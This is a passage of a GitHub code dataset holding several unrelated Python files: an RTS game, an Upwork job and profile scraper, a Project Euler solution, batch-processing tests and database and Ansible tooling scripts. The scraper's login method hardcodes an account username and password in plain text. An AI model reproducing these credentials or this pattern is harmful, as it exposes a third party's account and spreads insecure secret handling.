tiles_adjacentes.append(self.verifica_tropa_sp(direita))\r\n tiles_adjacentes.append(self.verifica_tropa_sp(esquerda))\r\n tiles_adjacentes.append(self.verifica_tropa_sp(baixo))\r\n tiles_adjacentes.append(self.verifica_tropa_sp(cima))\r\n\r\n tropas_adjacentes = []\r\n tropas_adjacentes.clear()\r\n\r\n tropas_adjacentes = [i for i in tiles_adjacentes if i != None]\r\n\r\n if tropas_adjacentes:\r\n tropa_atacada = random.choice(tropas_adjacentes)\r\n tropa_atacada.vida -= 1\r\n\r\n def atacar_sp(self): #Deve ser invocado por Sao Paulo\r\n for tropa in self.lista_tropas_sp:\r\n if not isinstance(tropa, Worker):\r\n if self.screen_coordinates_to_grid(tropa.pos) == (7, 19) or self.screen_coordinates_to_grid(tropa.pos) == (7, 20) or self.screen_coordinates_to_grid(tropa.pos) == (6, 19) or self.screen_coordinates_to_grid(tropa.pos) == (6, 20):\r\n self.lista_construcoes_br[0].vida -= 1\r\n\r\n else:\r\n direita = (tropa.pos[0] + num_colunas, tropa.pos[1])\r\n esquerda = (tropa.pos[0] - num_colunas, tropa.pos[1])\r\n baixo = (tropa.pos[0], tropa.pos[1] + num_linhas)\r\n cima = (tropa.pos[0], tropa.pos[1] - num_linhas)\r\n\r\n tiles_adjacentes = []\r\n tiles_adjacentes.clear()\r\n\r\n tiles_adjacentes.append(self.verifica_tropa_br(direita))\r\n tiles_adjacentes.append(self.verifica_tropa_br(esquerda))\r\n tiles_adjacentes.append(self.verifica_tropa_br(baixo))\r\n tiles_adjacentes.append(self.verifica_tropa_br(cima))\r\n\r\n tropas_adjacentes = []\r\n tropas_adjacentes.clear()\r\n\r\n tropas_adjacentes = [i for i in tiles_adjacentes if i != None]\r\n\r\n if tropas_adjacentes:\r\n tropa_atacada = random.choice(tropas_adjacentes)\r\n tropa_atacada.vida -= 1\r\n\r\n def mata_tropas(self):\r\n for tropa in self.lista_tropas_br:\r\n if tropa.vida <= 0:\r\n self.lista_tropas_br.remove(tropa)\r\n if tropa in self.tropas_selecionadas_br:\r\n self.tropas_selecionadas_br.remove(tropa)\r\n\r\n for tropa in self.lista_tropas_sp:\r\n if tropa.vida <= 0:\r\n self.lista_tropas_sp.remove(tropa)\r\n if tropa in self.tropas_selecionadas_sp:\r\n self.tropas_selecionadas_sp.remove(tropa)\r\n\r\n def verifica_floresta(self, pos): # Verifica se alguma floresta já está nessa posição\r\n pos = self.grid_to_screen_coordinates(self.screen_coordinates_to_grid(pos))\r\n for floresta in self.lista_florestas:\r\n if pos == floresta.pos:\r\n return floresta\r\n return None\r\n\r\n def verifica_mina_br(self, pos): # Verifica se alguma mina brasileira já está nessa posição\r\n pos = self.grid_to_screen_coordinates(self.screen_coordinates_to_grid(pos))\r\n for mina in self.lista_minas_br:\r\n if pos == mina.pos:\r\n return mina\r\n return None\r\n\r\n def verifica_mina_sp(self, pos): # Verifica se alguma mina paulista já está nessa posição\r\n pos = self.grid_to_screen_coordinates(self.screen_coordinates_to_grid(pos))\r\n for mina in self.lista_minas_sp:\r\n if pos == mina.pos:\r\n return mina\r\n return None\r\n\r\n def verifica_minas(self, pos): #Retorna uma tupla com os resultados de verifica_mina_br e verifica_mina_sp, respectivamente\r\n\r\n br = self.verifica_mina_br(pos)\r\n sp = self.verifica_mina_sp(pos)\r\n return (br, sp)\r\n\r\n def organiza_tropas_selecionadas(self): #Organiza ambas as listas de tropas selecionadas pra facilitar movimento\r\n\r\n self.tropas_selecionadas_br.sort(key = lambda tropa: (tropa.pos[1], tropa.pos[0]))\r\n self.tropas_selecionadas_sp.sort(key = lambda tropa: (tropa.pos[1], tropa.pos[0]))\r\n\r\n def gera_mapa(self, shape=(RAZAO[1], RAZAO[0]), # gera um array de ruido 2d\r\n scale=100, 
octaves=6,\r\n persistence=0.5,\r\n lacunarity=2.0,\r\n seed=None):\r\n\r\n if not seed:\r\n seed = np.random.randint(0, 100)\r\n\r\n arr = np.zeros(shape)\r\n for i in range(shape[0]):\r\n for j in range(shape[1]):\r\n arr[i][j] = pnoise2(i / scale,\r\n j / scale,\r\n octaves=octaves,\r\n persistence=persistence,\r\n lacunarity=lacunarity,\r\n repeatx=1024,\r\n repeaty=1024,\r\n base=seed)\r\n max_arr = np.max(arr)\r\n min_arr = np.min(arr)\r\n norm_me = lambda x: (x - min_arr) / (max_arr - min_arr)\r\n norm_me = np.vectorize(norm_me)\r\n arr = norm_me(arr)\r\n return arr\r\n\r\n def pinta_mapa(self, array):\r\n for x in range(RAZAO[1]):\r\n for y in range(RAZAO[0]):\r\n if array[x][y] > 0.5:\r\n pos = (x * num_linhas, y * num_colunas)\r\n floresta = Floresta(pos)\r\n self.lista_florestas.append(floresta)\r\n\r\nclass Tropa:\r\n def __init__(self, pos, vida):\r\n self.control = Control()\r\n self.pos = pos\r\n self.cor = AZUL\r\n #self.image = pygame.image.load('8x8.png')\r\n self.hidden = False\r\n self.vida = vida\r\n\r\n def __eq__(self, other):\r\n if not isinstance(other, Tropa):\r\n return NotImplemented\r\n return self.pos == other.pos and self.cor == other.cor and self.hidden == other.hidden\r\n\r\n def pinta_tropa_br(self, tela):\r\n grid = self.control.screen_coordinates_to_grid(self.pos)\r\n grid = self.control.grid_to_screen_coordinates(grid)\r\n if self.cor == AZUL:\r\n image = pygame.image.load('soldadobrNORMAL.png')\r\n else:\r\n image = pygame.image.load('soldadobrESCOLHIDO.png')\r\n image = pygame.transform.scale(image, (20,15))\r\n tela.blit(image, (grid[0],grid[1]))\r\n #pygame.draw.rect(tela, self.cor, (grid[0], grid[1], num_colunas, num_linhas), 0)\r\n\r\n def pinta_tropa_sp(self, tela):\r\n grid = self.control.screen_coordinates_to_grid(self.pos)\r\n grid = self.control.grid_to_screen_coordinates(grid)\r\n if self.cor == AZUL:\r\n image = pygame.image.load('soldadospNORMAL.png')\r\n else:\r\n image = pygame.image.load('soldadospESCOLHIDO.png')\r\n image = pygame.transform.scale(image, (20,15))\r\n tela.blit(image, (grid[0],grid[1]))\r\n #pygame.draw.rect(tela, self.cor, (grid[0], grid[1], num_colunas, num_linhas), 0)\r\n\r\nclass Worker(Tropa):\r\n def __init__(self, pos, vida):\r\n Tropa.__init__(self, pos, vida)\r\n self.trabalhando = False\r\n\r\n def __eq__(self, other):\r\n if not isinstance(other, Worker):\r\n return NotImplemented\r\n return self.trabalhando == other.trabalhando and self.pos == other.pos #and self.cor == other.cor and self.hidden == other.hidden\r\n\r\n def trabalha(self, target):\r\n self.trabalhando = True\r\n self.pos = target.pos\r\n self.hidden = True\r\n target.lista_trabalhadores.append(self)\r\n\r\n def sair_trabalho(self, target): #essa função só deve ser chamada pelo target\r\n self.trabalhando = False\r\n self.hidden = False\r\n\r\nclass Floresta:\r\n def __init__(self, pos):\r\n self.control = Control()\r\n self.pos = pos\r\n self.cor = VERDE\r\n\r\n def __eq__(self, other):\r\n if not isinstance(other, Floresta):\r\n return NotImplemented\r\n return self.pos == other.pos and self.cor == other.cor\r\n\r\n def pinta_floresta(self, tela):\r\n grid = self.control.screen_coordinates_to_grid(self.pos)\r\n grid = self.control.grid_to_screen_coordinates(grid)\r\n pygame.draw.rect(tela, self.cor, (grid[0], grid[1], num_colunas, num_linhas), 0)\r\n\r\nclass Construcao:\r\n def __init__(self, pos):\r\n self.control = Control()\r\n self.pos = pos\r\n self.cor = AZUL\r\n self.vida = 150\r\n\r\n def __eq__(self, other):\r\n if not 
isinstance(other, Construcao):\r\n return NotImplemented\r\n return self.pos == other.pos and self.cor == other.cor\r\n\r\n def pinta_construcao_br(self, tela):\r\n grid = self.control.screen_coordinates_to_grid(self.pos)\r\n grid = self.control.grid_to_screen_coordinates(grid)\r\n image = pygame.image.load('base-brasil.png')\r\n image = pygame.transform.scale(image, (40,30))\r\n tela.blit(image, (grid[0], grid[1]))\r\n\r\n def pinta_construcao_sp(self, tela):\r\n grid = self.control.screen_coordinates_to_grid(self.pos)\r\n grid = self.control.grid_to_screen_coordinates(grid)\r\n image = pygame.image.load('base-sao-paulo.png')\r\n image = pygame.transform.scale(image, (40,30))\r\n tela.blit(image, (grid[0], grid[1]))\r\n\r\nclass Mina:\r\n def __init__(self, pos):\r\n self.control = Control()\r\n self.pos = pos\r\n self.cor = AMARELO_CLARO\r\n self.estoque = 10000\r\n self.lista_trabalhadores = []\r\n\r\n def __eq__(self, other):\r\n if not isinstance(other, Mina):\r\n return NotImplemented\r\n return self.pos == other.pos and self.cor == other.cor and self.estoque == other.estoque and self.lista_trabalhadores == other.lista_trabalhadores\r\n\r\n def pinta_mina_br(self, tela):\r\n #grid = self.control.grid_to_screen_coordinates(self.pos)\r\n grid = self.pos\r\n image = pygame.image.load('mina-brasil.png')\r\n image = pygame.transform.scale(image, (20,20))\r\n tela.blit(image, (grid[0], grid[1]))\r\n\r\n def pinta_mina_sp(self, tela):\r\n #grid = self.control.grid_to_screen_coordinates(self.pos)\r\n grid = self.pos\r\n image = pygame.image.load('mina-sao-paulo.png')\r\n image = pygame.transform.scale(image, (20,20))\r\n tela.blit(image, (grid[0], grid[1]))\r\n\r\n def computa_trabalho(self):\r\n gold = 0\r\n for worker in self.lista_trabalhadores:\r\n self.estoque = self.estoque - 1\r\n if self.estoque == 0:\r\n del self\r\n gold = gold+1\r\n return gold\r\n","repo_name":"MaryanneCerqueira/RTS","sub_path":"classes.py","file_name":"classes.py","file_ext":"py","file_size_in_byte":25862,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"21701181611","text":"import requests\nfrom selenium import webdriver\nfrom selenium.webdriver.common.keys import Keys\nfrom selenium.webdriver.common.by import By\nimport time\nfrom selenium.webdriver.chrome.options import Options\nfrom selenium.common.exceptions import NoSuchElementException\nfrom fake_useragent import UserAgent\nimport json\nfrom selenium.webdriver.support.ui import WebDriverWait\nfrom selenium.webdriver.support import expected_conditions as EC\n\n\nclass Crawler:\n\n def __init__(self):\n self.url = 'https://www.upwork.com/ab/account-security/login'\n self.username_xpath = '//*[@id=\"login_username\"]'\n self.continue_mail_xpath = '//*[@id=\"login_password_continue\"]'\n self.password_xpath = '//*[@id=\"login_password\"]'\n self.login_button_xpath = '//*[@id=\"login_control_continue\"]'\n self.job_list = []\n self.driver = None\n self.user_agent = UserAgent().google \n\n def login(self):\n self.driver.get(self.url)\n time.sleep(1)\n print('writing username...')\n self.driver.find_element(By.XPATH, self.username_xpath).send_keys('bobsuperworker')\n self.driver.find_element(By.XPATH, self.continue_mail_xpath).click()\n time.sleep(1)\n print('writing password...')\n # improvment : Password should be stored as an environment variable\n self.driver.find_element(By.XPATH, self.password_xpath).send_keys('Argyleawesome123!')\n self.driver.find_element(By.XPATH, 
self.login_button_xpath).click()\n print('loggin in...')\n time.sleep(5)\n\n def initialize_driver(self):\n options = Options()\n options.add_argument(f\"user-agent={self.user_agent}\")\n options.add_argument(\"start-maximized\")\n options.add_argument(\"--headless\")\n self.driver = webdriver.Chrome(chrome_options=options)\n self.driver.get(self.url)\n print('Driver Initialized')\n return self.driver\n\n def get_sections(self):\n sections = self.driver.find_elements(By.TAG_NAME, 'section')\n return sections\n\n def get_title(self, section):\n WebDriverWait(self.driver, 10).until(EC.presence_of_element_located((By.TAG_NAME, \"h4\")))\n return section.find_element(By.TAG_NAME, 'h4').text\n\n def job_infos(self, section):\n # Improvment : each section could be stored independently\n return section.find_element(By.XPATH, './/div/div/div/div[2]/div/small[1]').text\n\n def job_description(self, section):\n return section.find_element(By.XPATH, './/div/div/div/div[2]/div/div[2]/div/div').text\n\n def job_skills(self, section):\n # Improvment : each skill could be stored in a list\n try:\n skills = section.find_element(By.CLASS_NAME, 'skills').text\n except Exception:\n skills = 'None'\n return skills\n\n def job_proposals(self, section):\n return section.find_element(By.XPATH, './/div/div/div/div[2]/div/div[3]').text\n\n def get_payment_info(self, section):\n payment = section.find_element(By.XPATH, './/div/div/div/div[2]/div/small[2]/span/span/span[3]/span')\n if payment.text == 'Payment verified':\n return True\n else:\n return False\n\n def get_amount_spent(self, section):\n return section.find_element(By.XPATH, './/div/div/div/div[2]/div/small[2]/span/span/span[4]').text\n\n def get_client_location(self, section):\n try:\n return section.find_element(By.CLASS_NAME, 'client-location').text\n except Exception:\n return 'None'\n\n def access_profile_page(self):\n profile = self.driver.find_element(By.XPATH, '//*[@id=\"nav-right\"]/ul/li[1]/ul/li[4]/a')\n profile_path = profile.get_attribute('href')\n self.driver.get(profile_path)\n\n def get_personnal_details(self):\n time.sleep(3)\n section = self.driver.find_element(By.XPATH, '//*[@id=\"main\"]/div[2]/div[2]/div[2]/div/div[1]/div[1]/section[1]/div/div[1]/div[1]/div')\n profile = {}\n profile['name'] = section.find_element(By.XPATH, './/div[2]/div/div[1]').text\n profile['location'] = section.find_element(By.XPATH, './/div[2]/div/div[2]').text\n profile['avatar'] = section.find_element(By.XPATH, './/div[1]/div/div/img').text\n return profile\n \n def get_professional_details(self):\n section = self.driver.find_element(By.XPATH, '//*[@id=\"main\"]/div[2]/div[2]/div[2]/div/div[1]/div[1]/section[2]')\n profile = {}\n profile['profession'] = section.find_element(By.XPATH, './/div[2]/section[1]/div[1]/div/div[1]/h2').text\n profile['rate'] = section.find_element(By.XPATH, './/div[2]/section[1]/div[1]/div/div[2]/div[1]/h3/span').text\n profile['description'] = section.find_element(By.XPATH, './/*[@id=\"up-line-clamp-v2-2\"]/span').text\n profile['availability'] = section.find_element(By.XPATH, './/div[1]/aside/section[4]/div[2]/p/span').text\n profile['languages'] = section.find_element(By.XPATH, './/div[1]/aside/section[4]/div[3]/ul').text\n profile['education'] = section.find_element(By.XPATH, './/div[1]/aside/section[4]/div[5]/ul').text\n profile['work_history'] = section.find_element(By.XPATH, './/div[2]/section[2]/div/div[3]/div/span').text\n profile['skills'] = section.find_element(By.XPATH, './/div[2]/section[4]/div/ul').text\n 
profile['employment_history'] = self.driver.find_element(By.XPATH, '//*[@id=\"main\"]/div[2]/div[2]/div[2]/div/div[1]/div[9]/section/div/ul').text\n        return profile\n\n    def get_profile_data(self):\n        profile = {**self.get_personnal_details(), **self.get_professional_details()}\n        return profile\n\n    def write_json_file(self, object, file_name):\n        f = open(f\"{file_name}.json\", \"w\")\n        f.write(json.dumps(object))\n        f.close()\n    \n\n    def run(self):\n        self.initialize_driver()\n        self.login()\n        sections = self.get_sections()\n        jobs = []\n        for s in sections:\n            data = {}\n            data['title'] = self.get_title(s)\n            data['infos'] = self.job_infos(s)\n            data['description'] = self.job_description(s)\n            data['skills'] = self.job_skills(s)\n            data['proposals'] = self.job_proposals(s)\n            data['payment_verified'] = self.get_payment_info(s)\n            data['amount'] = self.get_amount_spent(s)\n            data['location'] = self.get_client_location(s)\n            jobs.append(data)\n        self.write_json_file(jobs, 'jobs')\n        self.access_profile_page()\n        profile_data = self.get_profile_data()\n        self.write_json_file(profile_data, 'profile')\n    \n    \n\nif __name__ == \"__main__\":\n    Crawler().run()","repo_name":"alex-run-code/uwcrawler","sub_path":"webscraper.py","file_name":"webscraper.py","file_ext":"py","file_size_in_byte":6715,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"}
{"seq_id":"26570861713","text":"# -*- coding: utf-8 -*-\n\n# Problem 4 - Largest palindrome product\n\n# A palindromic number reads the same both ways. The largest palindrome made\n# from the product of two 2-digit numbers is 9009 = 91 × 99.\n \n# Find the largest palindrome made from the product of two 3-digit numbers.\n\n\nfrom itertools import combinations\n\n\ndef euler_4():\n    def _is_palindromic(integer):\n        s = str(integer)\n        return all([s[i] == s[(i * -1) - 1] for i in xrange(len(s) / 2)]) \n\n    palindromes = filter(_is_palindromic,\n                         [x[0] * x[1] for x in\n                          combinations(xrange(100, 1000), 2)])\n    return max(palindromes)\n\n\nif __name__ == '__main__':\n    assert euler_4() == 906609\n","repo_name":"jbozanowski/project-euler","sub_path":"python/euler_4.py","file_name":"euler_4.py","file_ext":"py","file_size_in_byte":712,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"}
{"seq_id":"36331744644","text":"import os\nimport unittest\nimport time\n\nimport numpy as np\nimport pandas as pd\n\nfrom batchprocessing import batchprocessing\n\nTEMPDIR = os.path.join('tests', 'temp')\n\n\nclass MyMonkeyPatch:\n    def __init__(self):\n        self.colnames = ['A', 'B']\n        self.df = pd.DataFrame(np.zeros((100, 2)))\n        self.rnd_df = pd.DataFrame(np.random.randn(100, 2))\n        self.df.columns = self.colnames\n        self.rnd_df.columns = self.colnames\n        self.checkpoint_path=os.path.join(TEMPDIR, 'mytest')\n        self.fake_cp_path = os.path.join(TEMPDIR, 'mytest_fake')\n        self._delete_test_path = os.path.join(TEMPDIR, 'delete_test')\n        self._n_batches = 10\n\n    @batchprocessing.BatchProcessor.batch_predict_auto\n    def add(self, X, n_batches=None, checkpoint_path=None, n_jobs=1):\n        time.sleep(.2)\n        return X + 1\n\n\nprocessor = batchprocessing.BatchProcessor(\n    n_batches=1,\n    checkpoint_path=os.path.join(TEMPDIR, 'mytest'),\n    n_jobs=1,\n    do_load_cp=False,\n    )\n\n\nprocessor2 = batchprocessing.BatchProcessor(\n    n_batches=10,\n    checkpoint_path=os.path.join(TEMPDIR, 'mytest'),\n    n_jobs=2,\n    do_load_cp=False,\n    )\n\n@processor._batch_predict_self\ndef my_func(X):\n    return X + 1\n\n\ndef test_classbased_bp():\n    X1 = 
pd.DataFrame(np.zeros((100, 2)))\n X2 = pd.DataFrame(np.arange(100))\n result = my_func(X=X1)\n assert np.allclose(result, pd.DataFrame(np.ones((100, 2))))\n result = my_func(X=X2)\n assert np.allclose(result, pd.DataFrame(np.arange(100))+1)\n\n\n@processor2._batch_predict_self\ndef my_func2(X):\n return X + 1\n\n\n@batchprocessing.BatchProcessor.batch_predict(checkpoint_path=os.path.join(TEMPDIR, 'mytest'), n_jobs=2, n_batches=10, do_load_cp=False)\ndef my_func3(X):\n return X + 1\n\n\ndef test_classbased_bp2():\n X1 = pd.DataFrame(np.zeros((100, 2)))\n X2 = pd.DataFrame(np.arange(100))\n result = my_func2(X=X1)\n assert np.allclose(result, pd.DataFrame(np.ones((100, 2))))\n result = my_func2(X=X2)\n assert np.allclose(result, pd.DataFrame(np.arange(100))+1)\n\n # my_func3\n result = my_func3(X=X1)\n assert np.allclose(result, pd.DataFrame(np.ones((100, 2))))\n result = my_func3(X=X2)\n assert np.allclose(result, pd.DataFrame(np.arange(100))+1)\n\n\nclass TestBatchProc(unittest.TestCase):\n def _setup(self):\n self.myobj = MyMonkeyPatch()\n self._n_batches = self.myobj._n_batches\n splits = np.array_split(self.myobj.rnd_df, self._n_batches)\n processor = batchprocessing.BatchProcessor(\n n_batches=self._n_batches,\n checkpoint_path=self.myobj.fake_cp_path)\n processor._check_makedir()\n # only save the first 5 iterations\n for i in range(5):\n splits_df = pd.DataFrame(splits[i])\n processor._save_checkpoints(\n iteration=i,\n df=splits_df,\n )\n\n def test_batch_predict(self):\n self._setup()\n x = self.myobj.add(X=self.myobj.df,\n n_batches=self._n_batches,\n checkpoint_path=self.myobj.checkpoint_path)\n assertion_df = pd.DataFrame(np.ones((100, 2)))\n assertion_df.columns = self.myobj.colnames\n assert x.shape == (100, 2)\n assert x.equals(assertion_df)\n\n def test_batch_predict_parallel(self):\n self._setup()\n x = self.myobj.add(X=self.myobj.df,\n n_batches=self._n_batches,\n checkpoint_path=self.myobj.checkpoint_path,\n n_jobs=4)\n assertion_df = pd.DataFrame(np.ones((100, 2)))\n assertion_df.columns = self.myobj.colnames\n assert x.shape == (100, 2)\n assert x.equals(assertion_df)\n\n def test_check_makedir(self):\n self._setup()\n processor = batchprocessing.BatchProcessor(\n n_batches=self._n_batches,\n checkpoint_path=self.myobj.checkpoint_path)\n processor._check_makedir()\n assert os.path.isdir(self.myobj.checkpoint_path)\n\n def test_cleanup_checkpoints(self):\n self._setup()\n processor = batchprocessing.BatchProcessor(\n n_batches=self._n_batches,\n checkpoint_path=self.myobj._delete_test_path)\n processor._check_makedir()\n processor._cleanup_checkpoints()\n assert os.path.isdir(self.myobj._delete_test_path) is False\n\n # def test_load_checkpoints(self):\n # self._setup()\n # x = self.myobj.add(X=self.myobj.df,\n # n_batches=self._n_batches,\n # checkpoint_path=self.myobj.fake_cp_path)\n # assertion_df1 = pd.DataFrame(np.ones((100, 2)))\n # assertion_df1.columns = self.myobj.colnames\n # assertion_df2 = pd.concat(\n # [self.myobj.rnd_df.iloc[:50, :], assertion_df1.iloc[50:, :]],\n # axis=0,\n # ignore_index=True\n # )\n # print(x)\n # print()\n # print(assertion_df2)\n # assert x.shape == (100, 2)\n # assert x.equals(assertion_df1) is False\n # assert np.allclose(x, assertion_df2, rtol=0.0001)\n #\n\nif __name__ == '__main__':\n 
unittest.main()\n","repo_name":"VFMR/batchprocessing","sub_path":"tests/myunittests.py","file_name":"myunittests.py","file_ext":"py","file_size_in_byte":5236,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"42338382791","text":"import sys\n\nsys.path.append(\"..\")\nsys.path.append(\".\")\n\nfrom IM.InfrastructureInfo import InfrastructureInfo\nfrom IM.VirtualMachine import VirtualMachine\nfrom IM.auth import Authentication\nfrom radl.radl_json import parse_radl as parse_radl_json\nfrom IM.config import Config\nfrom IM.db import DataBase\nimport time\nimport json\n\n\nclass DB150to151():\n @staticmethod\n def deserialize_vm(str_data):\n dic = json.loads(str_data)\n if dic['cloud']:\n dic['cloud'] = IM.CloudInfo.CloudInfo.deserialize(dic['cloud'])\n if dic['info']:\n dic['info'] = parse_radl_json(dic['info'])\n if dic['requested_radl']:\n dic['requested_radl'] = parse_radl_json(dic['requested_radl'])\n\n newvm = VirtualMachine(None, None, None, None, None, None, dic['im_id'])\n newvm.__dict__.update(dic)\n # If we load a VM that is not configured, set it to False\n # because the configuration process will be lost\n if newvm.configured is None:\n newvm.configured = False\n return newvm\n\n @staticmethod\n def deserialize_info(str_data):\n newinf = InfrastructureInfo()\n dic = json.loads(str_data)\n vm_list = dic['vm_list']\n vm_master_id = dic['vm_master']\n dic['vm_master'] = None\n dic['vm_list'] = []\n if dic['auth']:\n dic['auth'] = Authentication.deserialize(dic['auth'])\n if dic['radl']:\n dic['radl'] = parse_radl_json(dic['radl'])\n if 'extra_info' in dic and dic['extra_info'] and \"TOSCA\" in dic['extra_info']:\n dic['extra_info']['TOSCA'] = Tosca.deserialize(dic['extra_info']['TOSCA'])\n newinf.__dict__.update(dic)\n newinf.cloud_connector = None\n # Set the ConfManager object and the lock to the data loaded\n newinf.cm = None\n newinf.conf_threads = []\n for vm_data in vm_list:\n vm = DB150to151.deserialize_vm(vm_data)\n vm.inf = newinf\n if vm.im_id == vm_master_id:\n newinf.vm_master = vm\n newinf.vm_list.append(vm)\n return newinf\n\n @staticmethod\n def get_data_from_db(db_url):\n db = DataBase(db_url)\n if db.connect():\n inf_list = {}\n res = db.select(\"select * from inf_list where deleted = 0 order by id desc\")\n if len(res) > 0:\n for elem in res:\n try:\n inf = DB150to151.deserialize_info(elem[3])\n inf_list[inf.id] = inf\n except:\n sys.stderr.write(\"ERROR reading infrastructure from database, ignoring it!.\")\n else:\n sys.stderr.write(\"No data in database!.\")\n\n db.close()\n return inf_list\n else:\n sys.stderr.write(\"ERROR connecting with the database!.\")\n sys.exit(-1)\n\n @staticmethod\n def rename_old_data():\n db = DataBase(Config.DATA_DB)\n if db.connect():\n if db.table_exists(\"inf_list\"):\n now = str(int(time.time() * 100))\n if db.db_type == DataBase.SQLITE:\n db.execute('ALTER TABLE inf_list RENAME TO inf_list_%s;' % now)\n db.close()\n elif db.db_type == DataBase.MYSQL:\n db.execute('RENAME TABLE inf_list TO inf_list_%s;' % now)\n db.close()\n else:\n db.close()\n sys.stderr.write(\"ERROR connecting with the database!.\")\n sys.exit(-1)\n else:\n db.close()\n else:\n sys.stderr.write(\"ERROR connecting with the database!.\")\n sys.exit(-1)\n\n\nif __name__ == \"__main__\":\n if not Config.DATA_DB:\n sys.stderr.write(\"No DATA_DB defined in the im.cfg file!!\")\n sys.exit(-1)\n\n sys.stdout.write(\"Reading data from DB: %s.\\n\" % Config.DATA_DB)\n sys.stdout.write(\"Previous table 
inf_list will be renamed to inf_list_XXXXXX.\\n\")\n\n import IM.InfrastructureList\n inf_list = DB150to151.get_data_from_db(Config.DATA_DB)\n DB150to151.rename_old_data()\n # To create the new table\n sys.stdout.write(\"Saving data.\\n\")\n IM.InfrastructureList.InfrastructureList.init_table()\n IM.InfrastructureList.InfrastructureList.infrastructure_list = inf_list\n for inf_id in IM.InfrastructureList.InfrastructureList.infrastructure_list.keys():\n IM.InfrastructureList.InfrastructureList.save_data(inf_id)\n","repo_name":"grycap/im","sub_path":"scripts/db_1_5_0_to_1_5_1.py","file_name":"db_1_5_0_to_1_5_1.py","file_ext":"py","file_size_in_byte":4533,"program_lang":"python","lang":"en","doc_type":"code","stars":55,"dataset":"github-code","pt":"77"} +{"seq_id":"13202519394","text":"# Copyright 2022 NEC Corporation\r\n#\r\n# Licensed under the Apache License, Version 2.0 (the \"License\");\r\n# you may not use this file except in compliance with the License.\r\n# You may obtain a copy of the License at\r\n#\r\n# http://www.apache.org/licenses/LICENSE-2.0\r\n#\r\n# Unless required by applicable law or agreed to in writing, software\r\n# distributed under the License is distributed on an \"AS IS\" BASIS,\r\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\r\n# See the License for the specific language governing permissions and\r\n# limitations under the License.\r\nimport os\r\nimport base64\r\nfrom flask import g\r\nfrom common_libs.ansible_driver.functions.commn_vars_used_list_update import CommnVarsUsedListUpdate, CommnVarsUsedListDisuseSet\r\nfrom common_libs.ansible_driver.functions.util import get_AnsibleDriverTmpPath\r\nfrom common_libs.ansible_driver.classes.CheckAnsibleRoleFiles import VarStructAnalysisFileAccess\r\nfrom common_libs.ansible_driver.classes.VarStructAnalJsonConvClass import VarStructAnalJsonConv\r\n\r\n\r\ndef external_valid_menu_after(objDBCA, objtable, option):\r\n \"\"\"\r\n 登録前ホストネームバリデーション(登録/更新/廃止)\r\n ARGS:\r\n objdbca :DB接続クラスインスタンス\r\n objtabl :メニュー情報、カラム紐付、関連情報\r\n option :パラメータ、その他設定値\r\n \r\n RETRUN:\r\n retBoo :True/ False\r\n msg :エラーメッセージ\r\n option :受け取ったもの\r\n \"\"\"\r\n retBool = True\r\n retStrBody = \"\"\r\n zip_data = None\r\n zip_file_path = \"\"\r\n role_package_name = \"\"\r\n PkeyID = option['uuid']\r\n\r\n zipFileName = \"{}/20403_zip_format_role_package_file_{}.zip\"\r\n if option[\"cmd_type\"] == \"Register\":\r\n zip_data = option[\"entry_parameter\"][\"file\"][\"zip_format_role_package_file\"]\r\n role_package_name = option[\"entry_parameter\"][\"parameter\"][\"role_package_name\"]\r\n\r\n if option[\"cmd_type\"] == \"Update\":\r\n if option[\"entry_parameter\"][\"file\"][\"zip_format_role_package_file\"] != \\\r\n option[\"current_parameter\"][\"file\"][\"zip_format_role_package_file\"]:\r\n zip_data = option[\"entry_parameter\"][\"file\"][\"zip_format_role_package_file\"]\r\n\r\n # ロールパッケージの変更判定\r\n if zip_data:\r\n # zipファイルを生成\r\n zip_file_path = zipFileName.format(get_AnsibleDriverTmpPath(), os.getpid())\r\n fd = open(zip_file_path, \"wb\")\r\n fd.write(base64.b64decode(zip_data))\r\n fd.close()\r\n\r\n def_vars_list = {}\r\n def_varsval_list = {}\r\n def_array_vars_list = {}\r\n cpf_vars_list = {}\r\n tpf_vars_list = {}\r\n gbl_vars_list = {}\r\n ITA2User_var_list = {}\r\n User2ITA_var_list = {}\r\n save_vars_array = {}\r\n disuse_role_chk = True\r\n\r\n global_vars_master_list = {}\r\n template_master_list = {}\r\n objMTS = \"\"\r\n FileID = \"3\"\r\n obj = VarStructAnalysisFileAccess(objMTS,\r\n 
objDBCA,\r\n global_vars_master_list,\r\n template_master_list,\r\n '',\r\n False,\r\n False)\r\n JsonObj = VarStructAnalJsonConv()\r\n if option[\"cmd_type\"] == \"Register\" or option[\"cmd_type\"] == \"Update\" or option[\"cmd_type\"] == \"Restore\":\r\n # ロールパッケージzipが変更されているか判定\r\n if zip_data:\r\n retAry = obj.RolePackageAnalysis(zip_file_path,\r\n role_package_name,\r\n PkeyID,\r\n disuse_role_chk,\r\n def_vars_list,\r\n def_varsval_list,\r\n def_array_vars_list,\r\n True,\r\n cpf_vars_list,\r\n True,\r\n tpf_vars_list,\r\n gbl_vars_list,\r\n ITA2User_var_list,\r\n User2ITA_var_list,\r\n save_vars_array)\r\n retBool = retAry[0][0]\r\n # intErrorType = retAry[0][1]\r\n # aryErrMsgBody = retAry[0][2]\r\n retStrBody = retAry[0][3]\r\n def_vars_list = retAry[1]\r\n def_varsval_list = retAry[2]\r\n def_array_vars_list = retAry[3]\r\n cpf_vars_list = retAry[4]\r\n tpf_vars_list = retAry[5]\r\n gbl_vars_list = retAry[6]\r\n ITA2User_var_list = retAry[7]\r\n User2ITA_var_list = retAry[8]\r\n save_vars_array = retAry[9]\r\n Role_name_list = retAry[10]\r\n \r\n if retBool is False:\r\n return retBool, retStrBody, option\r\n\r\n if retBool is True:\r\n # 変数構造解析結果を退避\r\n JsonStr = JsonObj.VarStructAnalJsonDumps(def_vars_list,\r\n def_array_vars_list,\r\n tpf_vars_list,\r\n ITA2User_var_list,\r\n gbl_vars_list,\r\n Role_name_list)\r\n UpData = {}\r\n UpData[\"ROLE_PACKAGE_ID\"] = PkeyID\r\n UpData[\"VAR_STRUCT_ANAL_JSON_STRING\"] = JsonStr\r\n objDBCA.table_update(\"T_ANSR_MATL_COLL\", UpData, \"ROLE_PACKAGE_ID\", False)\r\n\r\n # 